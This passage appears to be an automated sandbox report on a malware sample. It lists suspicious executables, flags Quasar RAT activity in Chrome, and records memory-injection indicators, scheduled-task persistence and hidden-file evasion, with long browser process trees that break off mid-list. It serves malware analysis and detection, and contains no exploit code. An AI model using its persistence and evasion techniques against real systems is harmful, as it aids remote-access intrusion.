420	123.exe
3480	2klz.exe
2096	2klz.exe
1952	jerniuiopu.exe
1892	2klz.exe
4684	2klz.exe
2540	2klz.exe
4516	XClient.exe
572	2klz.exe
3340	Client.exe
5652	2klz.exe
5024	2klz.exe
3884	Client.exe
2360	QGFQTHIU.exe
3108	QGFQTHIU.exe
3048	ZubovLekciya.exe
1860	msedge..exe
7124	shost.exe
664	shost.exe
6592	2klz.exe
6432	njrtdhadawt.exe
8020	2klz.exe
1096	identity_helper.exe
7308	2klz.exe
1440	2klz.exe
2896	2klz.exe
648	2klz.exe
7532	2klz.exe
2892	2klz.exe
3048	2klz.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 6072 wrote to memory of 1612	6072	chrome.exe	82
PID 6072 wrote to memory of 1612	6072	chrome.exe	82
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 2700	6072	chrome.exe	83
PID 6072 wrote to memory of 5544	6072	chrome.exe	84
PID 6072 wrote to memory of 5544	6072	chrome.exe	84
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85
PID 6072 wrote to memory of 2024	6072	chrome.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5692	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe.zip"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Quasar RAT
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:6072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6340cc40,0x7fff6340cc4c,0x7fff6340cc58
  2⤵
  PID:1612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1824 /prefetch:2
  2⤵
  PID:2700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  PID:5544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:8
  2⤵
  PID:2024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3120 /prefetch:1
  2⤵
  PID:2328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:3396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4412,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4424 /prefetch:1
  2⤵
  PID:5180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4596,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:8
  2⤵
  PID:4652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4740,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:8
  2⤵
  PID:1000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4976,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4992 /prefetch:8
  2⤵
  PID:2968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5028 /prefetch:8
  2⤵
  PID:3940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  PID:5148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5140,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:2
  2⤵
  PID:5720
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Windows directory
  PID:2272
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff768b04698,0x7ff768b046a4,0x7ff768b046b0
    3⤵
    - Drops file in Windows directory
    PID:5564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4332,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5344 /prefetch:1
  2⤵
  PID:3336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4604,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4920 /prefetch:1
  2⤵
  PID:2468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5024,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:3116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3180,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3248 /prefetch:8
  2⤵
  PID:3348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3192,i,7270923610932438761,13999113229869878466,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4552 /prefetch:8
  2⤵
  - Modifies registry class
  PID:952

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff63093cb8,0x7fff63093cc8,0x7fff63093cd8
  2⤵
  PID:4156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1952 /prefetch:2
  2⤵
  PID:3252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
  2⤵
  PID:5228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:1532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:1880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
  2⤵
  PID:2076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
  2⤵
  PID:3808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5652 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
  2⤵
  PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
  2⤵
  PID:980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
  2⤵
  PID:3468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,6231118498518614017,2995269019539028484,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:5308

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5984

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1344

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2892
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:2692
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1856 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1eca24e2-e5e4-4889-bf6a-2ff631f846ff} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" gpu
    3⤵
    PID:4512
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2364 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2272 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1be860b-fea8-447c-92c0-254d8ca67711} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" socket
    3⤵
    - Checks processor information in registry
    PID:1680
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2776 -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3120 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {964d6963-6398-4ed2-a5c0-e8b3ebc3be4a} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" tab
    3⤵
    PID:1044
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3940 -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3912 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe08cbfa-b648-4a13-9af0-0630730d60a2} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" tab
    3⤵
    PID:6048
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4696 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4600 -prefMapHandle 4708 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee99002e-c15d-4fe7-8729-e36a9ac30eb3} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" utility
    3⤵
    - Checks processor information in registry
    PID:1416
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5344 -childID 3 -isForBrowser -prefsHandle 5380 -prefMapHandle 5356 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3b4cf26-6452-4d6a-bed0-f2c95c201623} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" tab
    3⤵
    PID:3968
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 4 -isForBrowser -prefsHandle 5540 -prefMapHandle 5548 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c318190-2ab1-47bb-9174-7ad9442413fa} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" tab
    3⤵
    PID:1888
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5800 -childID 5 -isForBrowser -prefsHandle 5720 -prefMapHandle 5724 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9773b4b-1d98-4228-8b76-a3b94a8da2cc} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" tab
    3⤵
    PID:4780
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6240 -childID 6 -isForBrowser -prefsHandle 6224 -prefMapHandle 2268 -prefsLen 27228 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a680126-5a9d-4a77-9e57-c2bd4c7fb776} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" tab
    3⤵
    PID:4852
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6500 -childID 7 -isForBrowser -prefsHandle 6492 -prefMapHandle 6404 -prefsLen 27228 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce22d82b-5563-4811-8f7a-a4d56a9e1688} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" tab
    3⤵
    PID:4212
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6212 -parentBuildID 20240401114208 -prefsHandle 4448 -prefMapHandle 4444 -prefsLen 33037 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1250b889-c2a4-4c5b-afff-87b759b17188} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" rdd
    3⤵
    PID:5756
- - C:\Program Files\Mozilla Firefox\firefox.exe
